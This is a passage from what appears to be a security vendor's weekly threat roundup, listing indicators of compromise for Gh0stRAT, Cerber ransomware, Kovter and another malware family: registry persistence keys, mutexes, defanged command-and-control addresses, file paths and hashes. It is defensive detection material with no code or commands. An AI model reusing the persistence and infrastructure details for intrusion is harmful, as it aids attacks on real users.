\n`doc-04-2c-docs[.]googleusercontent[.]com` | 1 \n`olodofries88[.]ddns[.]net` | 1 \n`doc-0c-bo-docs[.]googleusercontent[.]com` | 1 \n`doc-08-68-docs[.]googleusercontent[.]com` | 1 \n`doc-0o-bo-docs[.]googleusercontent[.]com` | 1 \n`www[.]habitactica[.]com` | 1 \n`www[.]71kamahistreet[.]com` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\D282E1` | 1 \n`%APPDATA%\\D282E1\\1E80C5.lck` | 1 \n`%APPDATA%\\Microsoft\\Crypto\\RSA\\S-1-5-21-2580483871-590521980-3826313501-500\\a18ca4003deb042bbee7a40f15e1970b_d19ab989-a35f-4710-83df-7b2db7efe7c5` | 1 \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5` | 3 \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\\Logs` | 3 \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\\Logs\\Administrator` | 3 \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\\run.dat` | 3 \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\\task.dat` | 2 \n`%System32%\\Tasks\\AGP Manager` | 2 \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\\catalog.dat` | 1 \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\\settings.bin` | 1 \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\\storage.dat` | 1 \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\\settings.bak` | 1 \n`%TEMP%\\53d8a91c-2dcd-4297-b0e0-e83b641b15e1` | 1 \n`%TEMP%\\96d19517-693a-4d9b-b0bb-58fe0e73df6a` | 2 \n`%HOMEPATH%\\subfolder1` | 2 \n`%APPDATA%\\poblyXd` | 1 \n`%APPDATA%\\poblyXd\\OeqyZ.exe` | 1 \n`%TEMP%\\tmp6C23.tmp` | 1 \n`%TEMP%\\tmpB4EC.tmp` | 1 \n`%HOMEPATH%\\subfolder1\\filename1.exe` | 1 \n`%HOMEPATH%\\BENZOXYPHE` | 1 \n`%HOMEPATH%\\BENZOXYPHE\\ARCSINEB.exe` | 1 \n`%HOMEPATH%\\subfolder1\\filename1.bat` | 1 \n`%TEMP%\\2022119685.bat` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0b023aa63679132222f38f83cc5d068b64294f27378657a83d5a1e382a0f5f6a 1e25b0da80f232dd7736f1df2d02c06c5352468c2b28edd38a5325ad726f4318 311e0a1c78adebcb8f4557b7982add59176bf534575f372b15de89b350f043be 56acc6bbd93fa3697f5c18ce956bc9fed48780a62f2de0af0422edc832a59cd7 5a4ae15c7cfc24d8d051199a42438fb860630f20eaf1d860a57b4483a9b2a1e5 62183848f4eb2622fa3c83e80d47993b177654cfd514479af13b35ccda07a9e1 6d878ebe8f57192c2a5a30313d09dcfc0a5535369dbaf3df1853148e260c15b2 a06f1515117373a10440cfc5fabd3a4edaa6bad649aa51512da3c84b732737f2 a49994d715e1420a4aeda5a840281d6a502b9785f4e9c900f1528a862f4f459d ba8781428af0e8996029c8c2a9ed858e67a1433123bf866459f112c6b1a4adb9 ec2b8daf0e06c86331993b6b47402bcfe64d7192860ff1fd9b12bf74c5412df5 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-qRgRz8qqp44/Xj2j2ebiInI/AAAAAAAADP8/PpLsgT79hx8y9jRZ4RUACM9dyZT5D0ZWQCLcBGAsYHQ/s1600/1e25b0da80f232dd7736f1df2d02c06c5352468c2b28edd38a5325ad726f4318_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-YCFyviCRhWo/Xj2j7HGLGXI/AAAAAAAADQE/NuPdAoH3kjoE0BuQGRH5i0Rz94QNV424ACLcBGAsYHQ/s1600/ba8781428af0e8996029c8c2a9ed858e67a1433123bf866459f112c6b1a4adb9_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-W0fiTEpMTvY/Xj2j_c_k7wI/AAAAAAAADQI/Rxx3VM6td9gJerSEm67Nvj-ANtz0Yf5bQCLcBGAsYHQ/s1600/ba8781428af0e8996029c8c2a9ed858e67a1433123bf866459f112c6b1a4adb9_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Worm.Gh0stRAT-7571319-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: TFM0N ` | 17 \nMutexes | Occurrences \n---|--- \n`pldofjxf` | 17 \n`67.198.149.220:8590` | 17 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`67[.]198[.]149[.]220` | 17 \n`67[.]198[.]149[.]218` | 17 \nFiles and or directories created | Occurrences \n---|--- \n`\\M7LTT2PQLUU39779` | 1 \n`\\4E332EPXUP2T2UDD` | 1 \n`\\4E332EPXUP2T2UDD\\setting.xml` | 1 \n`\\X1MEDE9U9MQ4Q1UV\\setting.xml` | 1 \n`\\M7LTT2PQLUU39779\\setting.xml` | 1 \n`\\PLT3XTU7P91P4DXM` | 1 \n`\\EVE2ML37TPT2MTQ3` | 1 \n`\\EVE2ML37TPT2MTQ3\\setting.xml` | 1 \n`\\9T7UQELV1DED3E1U` | 1 \n`\\3X2MMX7MP34P213D` | 1 \n`\\9T7UQELV1DED3E1U\\setting.xml` | 1 \n`\\3X2MMX7MP34P213D\\setting.xml` | 1 \n`\\MM393UEXP3U1V39T` | 1 \n`\\MM393UEXP3U1V39T\\setting.xml` | 1 \n`\\4D7913VVQ473ETLX` | 1 \n`\\4D7913VVQ473ETLX\\setting.xml` | 1 \n`\\3M2QLV9D1LQD4DUM` | 1 \n`\\3M2QLV9D1LQD4DUM\\setting.xml` | 1 \n`\\PLT3XTU7P91P4DXM\\setting.xml` | 1 \n`\\L4DV7DE92PLT3L7V` | 1 \n`\\L4DV7DE92PLT3L7V\\setting.xml` | 1 \n`\\PM9X2XM11XL7TP9P` | 1 \n`\\PM9X2XM11XL7TP9P\\setting.xml` | 1 \n`\\TX19M1LQ22VD4X9P` | 1 \n`\\TX19M1LQ22VD4X9P\\setting.xml` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 10090eb3748f2ef4a3410b978df0dec22a0ca628beeaa090831617fb997526cb 3eb86dad7bb8868860f384dd24d16549667ce5b061b58cac1d347d91bc570c8f 44d6e2ae47ae32f07c538f8ddfccc317f75473292ab3b6c83a5ae89d57331917 4c4f1c451117fcf06c6c58ff1db2146cddac669c7c986056d3a544bc639bc81b 551f4de8915c4f2cacf24a47a6f2a8abf04d3013f6d1dcac046b4cd08a316511 5a088eff9314d8fa8c0c3bcde24054159770727d2df8bfd60fc514e14845e60d 8100dadd48d770942ab9ff1fe2e6c07693173d96300d2562703739948239294e 85ca5679a5ca406211e22f5f51498814b632b21bd72de5259eced8b95d981c86 8c8f0914a29cfe562457968af091c6b8696782b86fda717165e8ddca2ac35b83 a12c5d5090f35f8a9aedf9f159469e45a34d76fda6369a7116ca0d6fbc1abfe9 b78ebf81a32e57b134f39555a748823641723d6f42c7878a8115bc6f1363aa31 be31cb2aaaa019e1d3726f8c23705ccef08c64e674a4ff768f5fdc7fbc2f26bb c0d07e09a2d35bcc63135595f0b5065e78adf3c292257e71a034348dd0d21123 cc440bfe8b21e8e03566e43eda8fbf78d5c1194dc9ae8d7228624bc1c17949af dd7089ce8745289e0962fea5c8001c7e0bcb73921c25710a3730ed4fc0d8d8c7 f977796809ac7f7babc3b7e44b84b348bb4965f9d3a4b43a6ea81c3b38ab9101 fcd3bc1ab5b4c663c0365471e09685e01160e1f614423a2c6bafbc89e3dac392 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-hW46CxO2aYM/Xj2kNH-nGUI/AAAAAAAADQQ/QujUg4vCG2sY2BQEEV2S0mE7xQ99Z7HAQCLcBGAsYHQ/s1600/10090eb3748f2ef4a3410b978df0dec22a0ca628beeaa090831617fb997526cb_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-6j-V0LRtA_Y/Xj2kReDl2BI/AAAAAAAADQU/hgS9W1lOSn4QQSPlFgoISvkJyu0y21YuwCLcBGAsYHQ/s1600/10090eb3748f2ef4a3410b978df0dec22a0ca628beeaa090831617fb997526cb_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Ransomware.Cerber-7571364-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\INTERNET EXPLORER\\PHISHINGFILTER \nValue Name: EnabledV8 ` | 36 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\INTERNET EXPLORER\\PHISHINGFILTER \nValue Name: EnabledV9 ` | 36 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ozilixas ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: uzurnpuj ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: esalaluj ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: agovoryb ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ozekyzhf ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INSTALLER\\USERDATA\\S-1-5-18\\PRODUCTS\\00004109A10090400000000000F01FEC \nValue Name: OutlookMAPI2Intl_1033 ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ixilxvuv ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: yxazigov ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ewetesyl ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: abizynyw ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: amjsegsd ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: iqapasjj ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: jliwywoc ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: enowivic ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: isydipfb ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: elulyzod ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: yhyhohux ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ewpbizyd ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: orebujyj ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ojofukax ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: yrunyfeb ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: esfdozih ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: uqihevur ` | 1 \nMutexes | Occurrences \n---|--- \n`Global\\epugepiqupupamyhatuxadu` | 19 \n`Global\\yladonexilyjabufyfetetawinipipi` | 19 \n`Global\\usysisexaqicuseteqisexe` | 1 \n`Global\\ysywiqujeqikevotevasowogajirube` | 1 \n`Global\\obegahatyqujehinunyfijewydopuva` | 15 \n`Global\\urohamiratototacykojumi` | 15 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`216[.]239[.]32[.]21` | 5 \n`216[.]239[.]38[.]21` | 9 \n`128[.]31[.]0[.]39` | 25 \n`216[.]239[.]36[.]21` | 7 \n`216[.]239[.]34[.]21` | 8 \n`86[.]59[.]21[.]38` | 21 \n`193[.]23[.]244[.]244` | 10 \n`208[.]83[.]223[.]34` | 22 \n`194[.]109[.]206[.]212` | 27 \n`154[.]35[.]32[.]5` | 25 \n`171[.]25[.]193[.]9` | 17 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`ipecho[.]net` | 36 \n`ikit[.]blasters[.]biz` | 2 \n`itud[.]jordaust[.]biz` | 1 \n`icev[.]blasters[.]biz` | 1 \n`eqak[.]blasters[.]biz` | 1 \n`esykowyx[.]blasters[.]biz` | 1 \n`ycyzacuk[.]blasters[.]biz` | 1 \n`imivutymucu[.]blasters[.]biz` | 1 \n`akiso[.]blasters[.]biz` | 1 \n`overypubu[.]blasters[.]biz` | 1 \n`yxaratdti[.]blasters[.]biz` | 1 \n`iraqrlan[.]blasters[.]biz` | 1 \n`ymex[.]blasters[.]biz` | 1 \n`ajevareda[.]blasters[.]biz` | 1 \n`ytosonyg[.]blasters[.]biz` | 1 \n`inuxaqwken[.]blasters[.]biz` | 1 \n`ydufujkse[.]blasters[.]biz` | 1 \n`oxunynaduba[.]blasters[.]biz` | 1 \n`ogylipympvy[.]blasters[.]biz` | 1 \n`ikawysal[.]blasters[.]biz` | 1 \n`asasexstab[.]blasters[.]biz` | 1 \n`yslx[.]blasters[.]biz` | 1 \n`ipel[.]blasters[.]biz` | 1 \n`axsrf[.]blasters[.]biz` | 1 \n`ixetehac[.]blasters[.]biz` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%ProgramData%\\igudikadilejogic\\00000000` | 20 \n`%ProgramData%\\igudikadilejogic\\01000000` | 20 \n`%ProgramData%\\igudikadilejogic\\02000000` | 20 \n`%ProgramData%\\igudikadilejogic` | 20 \n`%ProgramData%\\owegidamivejedir` | 1 \n`%ProgramData%\\owegidamivejedir\\otopevic` | 1 \n`%ProgramData%\\owegidamivejedir\\acopaqic` | 1 \n`%ProgramData%\\owegidamivejedir\\ykopapic` | 1 \n`%ProgramData%\\uciqelufyjyryluj` | 15 \n`%ProgramData%\\uciqelufyjyryluj\\emugavat` | 15 \n`%ProgramData%\\uciqelufyjyryluj\\atugolat` | 15 \n`%ProgramData%\\uciqelufyjyryluj\\ifugupat` | 15 \n`%SystemRoot%\\<random, matching [a-z]{8}>.exe` | 36 \n \n#### File Hashes\n\n` 01966d2f6ffc32e55ae9cf61192b45d79c9dea2f83223c1ed91fac631408f82a 0d7ca73038b630871bf332e06fa6efcdd8be9bd78fa9be3d09561eb25ab13970 15cfebd8e3941b8079a277535c7cd7487e10d0e5068a7c14d9e2a3056408f419 1ae503736b88bac3f50e9b537483c77cfe320ff6af1164c330b6c2647a480703 1d140e68d59e321066c64b4b8aa17ba676bfaf0e27a658e33f6d20b1c14d7e15 21fa344b6cbba9265353a5b9d1581a377c93e3896d1bd958ba2afb3c292bd168 24836009269f540fde8aa4d74b967a22c390042a30a76a124614ea8e2689ab8d 2bc36dd8f4c9207dcd4e66f8355adaa9fdf9037a0b6b7905512430d46e721947 2d08575cc2db1913c3ca603d3e528ccca990ebde7282d2e259ab85d7c51346b2 3275ad7d7eca08eb0e7109ba1eae744ad07b934e2c35b222bf4f4cfd1601cc29 35bc364d8460264beaaf89237901a720b546fec6a22cbeb166c4e49db6b6e44a 3d197b4896788463b4ce031cc6bb2c5f5ec3b987ee4e83f205cafbcaab384149 3ed3efa6bfc3da524a75013b03985098309ff8871d87e50a6c9b5cad50a7a115 45fa0f900980addac5bf4a528c805355ec8f3edebdf4f36d74d6498beb2f9e90 4794db3d19d99b81c31ab65b06568dc782b52ff80e6aa55a351a89613c3db86f 4ae3784d564c4558e3ea99b80cea23a8373d5f3ada449de72c08b2e95835868b 50d2e30bd801d5bd806d9c85abff75614d9d8d592b322d8fe5f9df2455bc5b0b 53d3e642d001fb563a21b0f0a28748d6ae26ad59b100ee1ba8cf10ec9e390f1c 55124c96c858d5c8ce6d233487a8aa26e8138f7871033e679c59c1dc114d1eb9 58866f02555d41c0a8299275ca036fe7c47553a6615e955e935675e53b0f49af 59c1ad24e09414391265b638fa32b743cf3e2097013eead30e47db9e02f3fbc2 5dc00ea3e7d3b2b9a239ba77525cbf6dc5ecebd1f9d97c25f884dabf043c5134 5ff54a15b800aba735883b03ab68cede13dc0bfbfcc56501d9ac26e9f4d1275c 610027ff0e1826f4af1539ae7142cdb355f255a8e27b0705cbb4e96f3e727613 7305660e95ca3fdcce3b8be49e6d8a6c9f61aa1162ce4b77c1cd06e2fbad6b71 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-y0HJpfQLTWQ/Xj2kh6lgfRI/AAAAAAAADQk/_KZaGsNM-Xch8xXqr-dtz47U74v4WVA7gCLcBGAsYHQ/s1600/4794db3d19d99b81c31ab65b06568dc782b52ff80e6aa55a351a89613c3db86f_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-Z--2vuwQoR0/Xj2kmlESA2I/AAAAAAAADQo/fjpfSH92-lAeOshZR-ISCKCXyUyucj6JwCLcBGAsYHQ/s1600/4794db3d19d99b81c31ab65b06568dc782b52ff80e6aa55a351a89613c3db86f_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Kovter-7571676-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\WINDOWSUPDATE \nValue Name: DisableOSUpgrade ` | 25 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\WINDOWSUPDATE\\OSUPGRADE \nValue Name: ReservationsAllowed ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3A91C13AB1 \nValue Name: 656f27d6 ` | 25 \n`<HKCU>\\SOFTWARE\\3A91C13AB1 \nValue Name: 656f27d6 ` | 25 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN ` | 25 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\WINDOWSUPDATE ` | 25 \n`<HKCU>\\SOFTWARE\\3A91C13AB1 ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3A91C13AB1 ` | 25 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\WINDOWSUPDATE\\OSUPGRADE ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3A91C13AB1 \nValue Name: 01b2a448 ` | 21 \n`<HKCU>\\SOFTWARE\\3A91C13AB1 \nValue Name: 01b2a448 ` | 21 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\K6TWCT \nValue Name: 6wRxA9ZQL ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\K6TWCT \nValue Name: cBr568g ` | 1 \n`<HKCR>\\RAVIGL4M ` | 1 \n`<HKCR>\\RAVIGL4M\\SHELL ` | 1 \n`<HKCR>\\RAVIGL4M\\SHELL\\OPEN ` | 1 \n`<HKCR>\\RAVIGL4M\\SHELL\\OPEN\\COMMAND ` | 1 \n`<HKCR>\\.W5PHE ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\7OGGSL \nValue Name: itYx4Vw ` | 1 \n`<HKCR>\\LH8Y07\\SHELL\\OPEN\\COMMAND ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\7OGGSL \nValue Name: 4mXmspx53 ` | 1 \n`<HKCR>\\.JG2BV ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\6381BA49F616F0D299E6 ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\GQSXMYCRDP ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\6381BA49F616F0D299E6 \nValue Name: 013E202B8A3B2DA1 ` | 1 \nMutexes | Occurrences \n---|--- \n`B3E8F6F86CDD9D8B` | 25 \n`A83BAA13F950654C` | 25 \n`EA4EC370D1E573DA` | 25 \n`Global\\7A7146875A8CDE1E` | 25 \n`Global\\ServicePackOrHotfix` | 4 \n`16194C57FC116A4A` | 1 \n`Global\\C50FA8B86824EC18` | 1 \n`9A64C6027FF2B729` | 1 \n`871D8E9395649C20` | 1 \n`Global\\FA5C6929342EC8E3` | 1 \n`4BAFA1398EB6B247` | 1 \n`D12FD5C5B231ABC9` | 1 \n`BBBF5BD15C2A2B8B` | 1 \n`Global\\704022EE540B2F4C` | 1 \n`67B0ADCC98BB6618` | 1 \n`53DF59FF587E423B` | 1 \n`Global\\8F98C5D480837CFA` | 1 \n`Global\\DA02B03F2C04CB99` | 1 \n`170B5BC07C6A1E73` | 1 \n`E5F0E11301A9BCDE` | 1 \n`Global\\6B1242F27DA8C7C4` | 1 \n`6154888E137CF66E` | 1 \n`1744E94C489AE9C9` | 1 \n`Global\\3535E8BAFCF21A1D` | 1 \n`7EB500E221ADC4FC` | 1 \n \n*See JSON for more IOCs\n\nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`23[.]10[.]193[.]233` | 6 \n`23[.]10[.]207[.]183` | 7 \n`173[.]201[.]146[.]128` | 7 \n`104[.]43[.]195[.]251` | 3 \n`104[.]40[.]211[.]35` | 2 \n`54[.]54[.]193[.]128` | 1 \n`115[.]76[.]165[.]127` | 1 \n`204[.]15[.]35[.]182` | 1 \n`189[.]113[.]72[.]33` | 1 \n`70[.]178[.]183[.]128` | 1 \n`113[.]181[.]187[.]227` | 1 \n`106[.]106[.]188[.]160` | 1 \n`36[.]207[.]228[.]85` | 1 \n`117[.]116[.]105[.]163` | 1 \n`4[.]213[.]232[.]24` | 1 \n`23[.]154[.]45[.]79` | 1 \n`89[.]72[.]221[.]41` | 1 \n`175[.]91[.]106[.]140` | 1 \n`195[.]107[.]81[.]250` | 1 \n`182[.]68[.]221[.]59` | 1 \n`51[.]183[.]235[.]214` | 1 \n`205[.]182[.]45[.]214` | 1 \n`20[.]169[.]182[.]215` | 1 \n`8[.]51[.]40[.]103` | 1 \n`196[.]207[.]144[.]60` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`find-dentalimplants[.]com` | 25 \n`e10088[.]dspb[.]akamaiedge[.]net` | 7 \n`e3673[.]dspg[.]akamaiedge[.]net` | 7 \n`www[.]swsoft[.]com` | 1 \n`rolfrosskopf[.]de` | 1 \n`www[.]virtuozzo[.]com` | 1 \n`littleauggie[.]com` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\\runme.exe` | 7 \n`%System32%\\WindowsPowerShell\\v1.0\\about_special_characters.help.txt (copy)` | 4 \n`%System32%\\WindowsPowerShell\\v1.0\\about_split.help.txt (copy)` | 4 \n`%System32%\\WindowsPowerShell\\v1.0\\about_switch.help.txt (copy)` | 4 \n`%System32%\\WindowsPowerShell\\v1.0\\about_type_operators.help.txt (copy)` | 4 \n`%System32%\\WindowsPowerShell\\v1.0\\about_types.ps1xml.help.txt (copy)` | 4 \n`%System32%\\WindowsPowerShell\\v1.0\\about_variables.help.txt (copy)` | 4 \n`%System32%\\WindowsPowerShell\\v1.0\\about_while.help.txt (copy)` | 4 \n`%System32%\\WindowsPowerShell\\v1.0\\about_wildcards.help.txt (copy)` | 4 \n`%System32%\\WindowsPowerShell\\v1.0\\default.help.txt (copy)` | 4 \n`%System32%\\WindowsPowerShell\\v1.0\\getevent.types.ps1xml (copy)` | 4 \n`%System32%\\WindowsPowerShell\\v1.0\\powershell.exe (copy)` | 4 \n`%System32%\\WindowsPowerShell\\v1.0\\powershell.exe.mui (copy)` | 4 \n`%System32%\\WindowsPowerShell\\v1.0\\powershell_ise.exe (copy)` | 4 \n`%System32%\\WindowsPowerShell\\v1.0\\powershell_ise.resources.dll (copy)` | 4 \n`%System32%\\WindowsPowerShell\\v1.0\\pspluginwkr.dll (copy)` | 4 \n`%System32%\\WindowsPowerShell\\v1.0\\pwrshmsg.dll (copy)` | 4 \n`%System32%\\WindowsPowerShell\\v1.0\\pwrshsip.dll (copy)` | 4 \n`%System32%\\WindowsPowerShell\\v1.0\\types.ps1xml (copy)` | 4 \n`%System32%\\WsmAuto.dll (copy)` | 4 \n`%System32%\\WsmPty.xsl (copy)` | 4 \n`%System32%\\WsmRes.dll (copy)` | 4 \n`%System32%\\WsmSvc.dll (copy)` | 4 \n`%System32%\\WsmTxt.xsl (copy)` | 4 \n`%System32%\\WsmWmiPl.dll (copy)` | 4 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 072035cc5fd36e5a21299e4c300311dfaed05b680f7b7e8ccb5d4212fd638712 080de2ac18189ab84019a22f5b7d5d49f087db70a4b52514961acf92ce302946 0a69ad9ef0cf4c9c908e70cc905836fb3e268f6971cc7b5f624f6fc3d895b9cf 1500979f9783b9f49dee8769874d5b23538323d2b483d9997304a619a527bae9 1fcfd76d6196ae6503fce812aff4b24fa498ee5d53090c74894881a057f05a2b 2563ce697e2da03842e74a292b82e2159ca18790e3921a9914a3383a35227fc9 2593888c917bccb77ef2b66467dce8ba0c17319a7f0e403fb5b6bff7be9f969f 262ca735f83655220d16258371d7d8ab50a84978185e7885a15d3cbc2b8c9d93 279ec147df4ab831ed8e3c9981647f21fa264544245c188d39bf3942e2907eba 2875a1bab3f9d8134995621a358fb158a1b254044177276fa6fd90e711c974b2 2bd029e950c1a626d5c979a1a1af238711da6af5cc84058ca8363ab4d5b0e9ba 2ca80804b8ec61c82e050c0eaf62166a0c313ee3adc1b28d03586a4a5227797a 2e42247fc678aa01b440958456b7f232e71775259c54bc9202b730d5a4e76bcc 2f08d47ecf5c2656ed75786d82b1d5a5388699f1533a9c8c91274dab6c085523 38c3aa03de00f8fc19121cd5ffb8fda9babecb621541d48cf4a3640e8f657e9f 3b4c1abc83f05a1a2167510a78b6e32027c69e0fca9d3dc31668b81ea9aff937 3b74d8005163c38c1c1187cc914632dda1fc530821d25839c4b41e08ee626641 3bb4032f62824b803bc6c63c0e92f7d1117699585375e879b24ed392754a1c6e 458f6e2b8a63b419b9f47ef20b1dd0e3a6652d06100c30a0f031b7e84e48e4b9 4b1977f5f8bd5108f8b30e827aea6f536417db02ba087698a44142f18c2307b0 50dfd29d9a7ca4f48e04c015b93fa05d28416fe84b9422669238e1b6089b9ca3 51df5522ddedb5bec493acc2c4ffb8642d3a9e8c6a0d7258454bf2ff8398697a 5a0ca2319596e3b4d353cc091d8d959eafae9eb0c4bf2116256e6bab2909d75e 5da7a9fd096ffe66991211b4556352e58d177e72dbe57cd84269c0bded5396ec 5ebd2eaa37527dafa68105ededbc8304472c0a25be6b7e5d606c0deab526b07c `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP | N/A \nCloudlock | N/A \nCWS | N/A \nEmail Security | N/A \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-5DMV8eD7-Vs/Xj2k0IJ1pOI/AAAAAAAADQw/F7VBCZzrABMgnEfnssEFWkmL5t5uF8X0ACLcBGAsYHQ/s1600/279ec147df4ab831ed8e3c9981647f21fa264544245c188d39bf3942e2907eba_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-YbAFLkW6raI/Xj2k5kAOGHI/AAAAAAAADQ4/Lze-0J8fH0E0RKGAAtUZJSBm5oliAT05gCLcBGAsYHQ/s1600/730a3fb6b6e227b6d67ad387502f945bb2fed9dc3838e2cb77330e2d185570ba_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### 